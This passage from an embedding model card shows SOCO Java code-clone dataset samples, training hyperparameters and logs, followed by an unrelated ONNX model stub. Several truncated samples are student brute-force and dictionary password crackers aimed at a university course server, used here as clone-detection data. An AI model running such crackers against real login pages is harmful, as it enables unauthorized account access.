pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br><br><br><br><br><br><br><br>import java.io.*;<br>import java.net.*;<br>import javax.swing.Timer;<br>import java.awt.event.*;<br>import javax.swing.JOptionPane;<br><br>public class WatchDog <br>{<br> private static Process pro = null;<br> private static Runtime run = Runtime.getRuntime();<br> <br> public static void main(String[] args) <br> {<br> String cmd = null;<br> try<br> {<br> cmd = new String("wget -O original.txt http://www.cs.rmit.edu./students/");<br><br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> }<br> catch (IOException e)<br> {<br> }<br> <br> class Watch implements ActionListener<br> {<br> BufferedReader in = null;<br> String str = null;<br> Socket socket;<br> public void actionPerformed (ActionEvent event)<br> {<br> <br> try<br> {<br> System.out.println("in Watch!");<br> String cmd = new String();<br> int ERROR = 1;<br> cmd = new String("wget -O new.txt http://www.cs.rmit.edu./students/");<br><br><br> System.out.println(cmd);<br> cmd = new String("diff original.txt new.txt");<br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> in = new Buf...</code> |
| <code><br>import java.net.*; <br>import java.io.*; <br>public class BruteForce {<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Error: Correct Format Filename, username e.g<>"); <br> System.exit(1); <br> }<br> BruteForce bruteForce1 = new BruteForce();<br> Result=bruteForce1.Password("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("The Password of "+args[0]+"is.."+Result); <br> <br> }<br><br><br><br> private String Password(String urlString,String username) <br> { <br> int cnt=0;<br> <br> t0 = System.currentTimeMillis(); <br> for ( char ch = 'A'; ch <= 'z'; ch++ )<br> { <br> if (ch>'Z' && ch<'a')<br> { <br> ch='a'; <br> } <br> <br> for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )<br> { <br> <br> if (ch1>'Z' && ch1<'a')<br> { <br> ch1='a'; <br> }<br><br><br> for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )<br> { <br> if (ch2>'Z' && ch2<'a')<br> { <br> ...</code> | <code><br><br>import java.net.*; <br>import java.io.*; <br>import java.util.Date; <br>public class Dictionary{<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Correct Format Filename username e.g<>"); <br> System.exit(1); <br> }<br> <br> Dictionary dicton1 = new Dictionary();<br> Result=dicton1.Dict("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("Cracked Password for The User "+args[0]+" The Password is.."+Result); <br> <br><br> <br> <br> }<br><br><br><br> private String Dict(String urlString,String username) <br> { <br> int cnt=0;<br> FileInputStream stream=null;<br> DataInputStream word=null;<br><br> try{ <br> stream = new FileInputStream ("/usr/share/lib/dict/words"); <br><br> word =new DataInputStream(stream);<br> t0 = System.currentTimeMillis(); <br> while (word.available() !=0) <br> {<br> <br> password=word.readLine();<br> if (password.length()!=3)<br> {<br> continue;<br> }<br> System.out.print("...</code> | <code><br>package java.httputils;<br><br>import java.io.IOException;<br>import java.net.MalformedURLException;<br>import java.util.ArrayList;<br>import java.util.Iterator;<br><br><br>public class RunnableHttpRequest extends Thread<br>{<br> protected String targetURL = "http://localhost:8080/";<br> protected int requestCount = 1;<br> protected ArrayList timingList = new ArrayList();<br> protected HttpRequestClient req;<br> Boolean finished = new Boolean(false);<br> HttpRequestThreadPool pool;<br><br> <br> public void run()<br> {<br> try<br> {<br> for (int i = 0; i < getRequestCount() && !getFinished().booleanValue(); i++)<br> {<br> try<br> {<br> req =<br> new HttpRequestClient(getTargetURL());<br><br> <br> }<br> catch (MalformedURLException e)<br> {<br> e.printStackTrace();<br> break;<br> }<br> catch (IOException e)<br> {<br> ...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
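
With triplet columns like the ones above, `MultipleNegativesRankingLoss` treats each `negative_code` as an explicit hard negative on top of the in-batch negatives, and `scale=20.0` multiplies the cosine similarities before the softmax over candidates, sharpening the ranking objective. A minimal sketch of constructing the loss with the listed parameters (the base checkpoint name is a placeholder, not the model this card was trained from):

```python
# Sketch only: constructing MultipleNegativesRankingLoss with the
# parameters listed above. The base model name is a placeholder.
from sentence_transformers import SentenceTransformer, util
from sentence_transformers.losses import MultipleNegativesRankingLoss

model = SentenceTransformer("microsoft/unixcoder-base")  # placeholder base model

# scale=20.0 and cosine similarity match the parameters above;
# gather_across_devices=False is the library default.
loss = MultipleNegativesRankingLoss(model, scale=20.0, similarity_fct=util.cos_sim)
```
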
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 4,296 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:--------------------------------|:--------------------------------|:--------------------------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
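
The card reports no evaluator, but these triplets map directly onto sentence-transformers' `TripletEvaluator`, which reports the fraction of triplets where the anchor embeds closer to the positive than to the negative. A sketch under the assumptions that the dataset split is named `train` and using a placeholder model path:

```python
# Sketch: triplet-accuracy evaluation on the SOCO_TRAIN_java triplets.
# The split name ("train") and the model path are assumptions.
from datasets import load_dataset
from sentence_transformers import SentenceTransformer
from sentence_transformers.evaluation import TripletEvaluator

ds = load_dataset(
    "buelfhood/SOCO_TRAIN_java",
    revision="44ca4ff546c090153d7903c15aeda036891ec476",
    split="train",
)

evaluator = TripletEvaluator(
    anchors=ds["anchor_code"],
    positives=ds["positive_code"],
    negatives=ds["negative_code"],
    name="soco-java-triplets",
)

model = SentenceTransformer("path/to/this/model")  # placeholder checkpoint path
print(evaluator(model))  # fraction of triplets with sim(a, p) > sim(a, n)
```
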
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
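
Expressed in code, the non-default values above correspond to the following `SentenceTransformerTrainingArguments`; this is a sketch rather than the exact training script, and `output_dir` is a placeholder:

```python
# Sketch of the non-default hyperparameters as training arguments.
from sentence_transformers import SentenceTransformerTrainingArguments
from sentence_transformers.training_args import BatchSamplers

args = SentenceTransformerTrainingArguments(
    output_dir="outputs",                       # placeholder
    per_device_train_batch_size=16,
    learning_rate=2e-5,
    num_train_epochs=1,
    warmup_ratio=0.1,
    fp16=True,
    batch_sampler=BatchSamplers.NO_DUPLICATES,  # keeps duplicate texts out of a
                                                # batch, where they would act as
                                                # false in-batch negatives
)
```

The `no_duplicates` batch sampler matters specifically for `MultipleNegativesRankingLoss`: every other example in the batch is treated as a negative, so a duplicate of the anchor or positive elsewhere in the batch would be penalized as if it were a non-match.
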
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.0414 | 100 | 1.297 |
| 0.0827 | 200 | 0.3721 |
| 0.1241 | 300 | 0.3752 |
| 0.1655 | 400 | 0.3124 |
| 0.2069 | 500 | 0.3386 |
| 0.2482 | 600 | 0.3278 |
| 0.2896 | 700 | 0.3256 |
| 0.3310 | 800 | 0.318 |
| 0.3724 | 900 | 0.3164 |
| 0.4137 | 1000 | 0.3372 |
| 0.4551 | 1100 | 0.3126 |
| 0.4965 | 1200 | 0.3015 |
| 0.5379 | 1300 | 0.3224 |
| 0.5792 | 1400 | 0.3263 |
| 0.6206 | 1500 | 0.3165 |
| 0.6620 | 1600 | 0.3376 |
| 0.7034 | 1700 | 0.2949 |
| 0.7447 | 1800 | 0.304 |
| 0.7861 | 1900 | 0.3123 |
| 0.8275 | 2000 | 0.2829 |
| 0.8688 | 2100 | 0.2901 |
| 0.9102 | 2200 | 0.2973 |
| 0.9516 | 2300 | 0.3004 |
| 0.9930 | 2400 | 0.3657 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
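
A quick way to check a local environment against these pins (assuming all six packages are installed):

```python
# Quick environment check against the versions listed above.
import accelerate, datasets, sentence_transformers, tokenizers, torch, transformers

for name, mod in [
    ("Sentence Transformers", sentence_transformers),
    ("Transformers", transformers),
    ("PyTorch", torch),
    ("Accelerate", accelerate),
    ("Datasets", datasets),
    ("Tokenizers", tokenizers),
]:
    print(f"{name}: {mod.__version__}")
```
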
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
---

modelId: onnxmodelzoo/resnetrs350_Opset17
author: onnxmodelzoo
last_modified: 2025-09-23T14:25:06Z
downloads: 0
likes: 0
library_name: null
tags: ["onnx", "Computer_Vision", "en", "license:apache-2.0", "region:us"]
pipeline_tag: null
createdAt: 2025-09-23T14:24:35Z
card:

---
language: en
license: apache-2.0
model_name: resnetrs350_Opset17.onnx
tags:
- Computer_Vision
---